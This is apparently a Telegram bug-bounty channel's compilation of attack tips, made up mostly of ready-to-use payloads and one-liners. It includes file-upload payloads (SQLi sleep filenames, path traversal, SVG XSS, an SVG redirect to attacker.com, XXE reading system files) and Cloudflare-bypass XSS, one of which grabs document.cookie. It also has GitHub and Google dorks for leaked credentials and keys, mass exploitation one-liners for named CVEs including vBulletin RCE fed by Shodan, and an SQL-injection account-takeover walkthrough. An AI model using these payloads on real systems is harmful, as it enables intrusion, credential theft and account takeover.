CTF | Bug Bounty

🚨 XSS Hunting from WaybackURLS 🔍 Payload : waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss #bugbountytips #bugbounty

🖥Chaining Vulnerabilities through File Upload🖥 SLQi⏳ 'sleep(20).jpg sleep(25)-- -.jpg Path traversal⏳

../../etc/passwd/logo.png
../../../logo.png

XSS⏳

->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open redirect ⏳

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

==================== Join Our Telegram Channel https://t.me/ctftm

🔥 Github-Dork Happy Hunting 🔍 api_key 🔍 app_AWS_SECRET_ACCESS_KEY 🔍 app_secret 🔍 authoriztion 🔍 Ldap 🔍 aws_access_key_id 🔍 secret 🔍 bash_history 🔍 bashrc%20password 🔍 beanstalkd 🔍 client secre 🔍 composer 🔍 config 🔍 credentials 🔍 DB_PASSWORD 🔍 dotfiles 🔍 .env file 🔍 .exs file 🔍 extension:json mongolab.com 🔍 extension:pem%20private 🔍 extension:ppk private 🔍 extension:sql mysql dump 🔍 extension:yaml mongolab.com 🔍 .mlab.com password 🔍 mysql 🔍 npmrc%20_auth 🔍 passwd 🔍 passkey 🔍 rds.amazonaws.com password 🔍 s3cfg 🔍 send_key 🔍 token 🔍 filename:.bash_history 🔍 filename:.bash_profile aws 🔍 filename:.bashrc mailchimp 🔍 filename:CCCam.cfg 🔍 filename:config irc_pass 🔍 filename:config.php dbpasswd 🔍 filename:config.json auths 🔍 filename:config.php pass 🔍 filename:config.php dbpasswd 🔍 filename:connections.xml 🔍 filename:.cshrc 🔍 filename:.git-credentials 🔍 filename:.ftpconfig 🔍 filename:.history 🔍 filename:gitlab-recovery-codes.txt 🔍 filename:.htpasswd 🔍 filename:id_rsa 🔍 filename:.netrc password 🔍 FTP 🔍 filename:wp-config.php 🔍 git-credentials 🔍 github_token 🔍 HEROKU_API_KEY language:json 🔍 HEROKU_API_KEY language:shell 🔍 GITHUB_API_TOKEN language:shell 🔍 oauth 🔍 OTP 🔍 databases password 🔍 [WFClient] Password= extension:ica 🔍 xoxa_Jenkins 🔍 security_credentials #bugbountytips #GitHub ==================== Join Our Telegram Channel https://t.me/ctftm

==================== Join Our Telegram Channel https://t.me/ctftm==================== Join Our Telegram Channel https://t.me/ctftmNew Xss Fly Under Radar Cloudflare Bypass 🧱 Payload : "><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus> Credit -Halim ==================== Join Our Telegram Channel https://t.me/ctftm

Awesome One-liner Bug Bounty : > A collection of awesome one-liner scripts especially for bug bounty. This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily♥ welcome. ## Definitions This section defines specific terms or placeholders that are used throughout one-line command/scripts. - 1.1. "HOST" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1. - 1.2. "HOSTS.txt" contains criteria 1.1 with more than one in file. - 2.1. "URL" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol. - 2.2. "URLS.txt" contains criteria 2.1 with more than one in file. - 3.1. "FILE.txt" or "FILE{N}.txt" means the files needed to run the command/script according to its context and needs. - 4.1. "OUT.txt" or "OUT{N}.txt" means the file as the target storage result will be the command that is executed. --- ### Local File Inclusion > @dwisiswant0

gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

### Open-redirect > @dwisiswant0

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

> @N3T_hunt3r

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

### XSS > @cihanmehmet

gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt

> @fanimalikhack

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

> @oliverrickfors

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

### Prototype Pollution > @R0X4R

subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

### CVE-2020-5902 > @Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

### CVE-2020-3452 > @vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt

### CVE-2022-0378 > @7h3h4ckv157

cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done

### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution > @Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

### Find JavaScript Files ==================== Join Our Telegram Channel https://t.me/ctftm

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#BugBounty #bugbountytips

SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 2. Final Query: 8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') -- 2024-04-03 21:20:55 >> Exact time and date 1 >> attempts you can see the 200 response last you can login with the 1110 OTP and get access to the victim account :) ==================== Join Our Telegram Channel https://t.me/ctftm

(Hard filter+Cloudflare bypassed) Stored XSS leads account takeover Payload: xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)> Tips: Always play with input's => reflecting value's tags. even there is waf/cloudflare. #bugbountytip #bugbounty

Azure OSINT Google Dork List - site:blob.core.windows.net “keyword” - site:"blob.core.windows.net" and intext:"CONFIDENTIAL" - site:*.core.windows.net intext:"TLP:RED" - site:*.core.windows.net - site:*.core.windows.net +blob - site:*.core.windows.net +files -web -blob - site:*.core.windows.net -web - site:*.core.windows.net -web -blob -files - site:*.core.windows.net inurl:dsts.dsts - site:*.core.windows.net inurl:"term" -web - site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username) - intext:connectionstring blob filetype:config - intext:accountkey windows.net filetype:xml - intext:storageaccountkey windows.net filetype:txt Please Share Across Your Network, Someone Might Really Be Looking For This. #Infosec #GHDB #Azure #bugbounty

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E